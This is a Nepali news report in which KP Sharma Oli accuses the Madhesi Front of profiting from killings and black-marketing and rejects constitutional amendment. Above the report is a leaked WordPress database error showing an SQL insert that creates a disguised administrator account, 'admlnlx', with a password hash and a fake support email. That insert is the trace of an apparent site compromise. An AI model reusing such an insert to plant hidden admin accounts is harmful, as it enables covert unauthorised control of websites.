WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0Tz4wpMAZbFBzsiAsu.RUymPUKt8c0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:40:49', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ११-
नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले मारकाट व्यवसायु बन्द भएकाले मधेसी मोर्चा आफूप्रति आक्रोशित बनेको बताएका छन्।
पार्टी केन्द्रीय कार्यालय धुम्बाराहीमा आज आयोजित मधेसका मुद्दा,भ्रम र यथार्थु विषयक कार्यक्रममा बोल्दै ओलीले भने, म प्रधानमन्त्री हुनुअघि ४७ जनाको ज्यान गइसकेको थियो। मैले नेतृत्व लिइसकेपछि मान्छे मारिने क्रम रोकियो। त्यो व्यवसाय चौपट भएपछि मोर्चाका साथीहरु मसँग रिसाउनुभएको छ। मोर्चाले अरुले गरेको नाकाबन्दीको स्वामित्व आफूले नाका भाग लगाई कालोबजारी गरेको ओलीले आरोप लगाए। मारकाट व्यवसाय नचलेपछि कालोबजारी ठप्प भयो। यसकारण मोर्चाको धारणा मप्रति नकारात्मक बन्दै गयो, अध्यक्ष ओलीले भने।
संविधान कुनै पनि हालतमा संशोधन हुन नसक्ने पुरानै अडान दोहोर्याउँदै उनले संघीयता कुनै धर्म नभएको जिकिर गरे। संशोधन नै गर्नुपरे २ नम्बर प्रदेशको सीमांकन परिमार्जन सहित गर्नुपर्ने ओलीको धारणा थियो। २ नम्बर प्रदेश बेठिक नै छ त भन्दैनौं तर त्यस बेला द्वन्द्व व्यवस्थापन होस् भनेर हामीले गल्ती गरेको हौं, उनले भने।
पहिले कांग्रेसको सहयोगमा ५ नम्बर प्रदेशका लागि आफूले हस्ताक्षर गरे पनि कथित मधेसी र माओवादीका कारण आफू ब्याक हट्नुपरेको ओलीले बताए।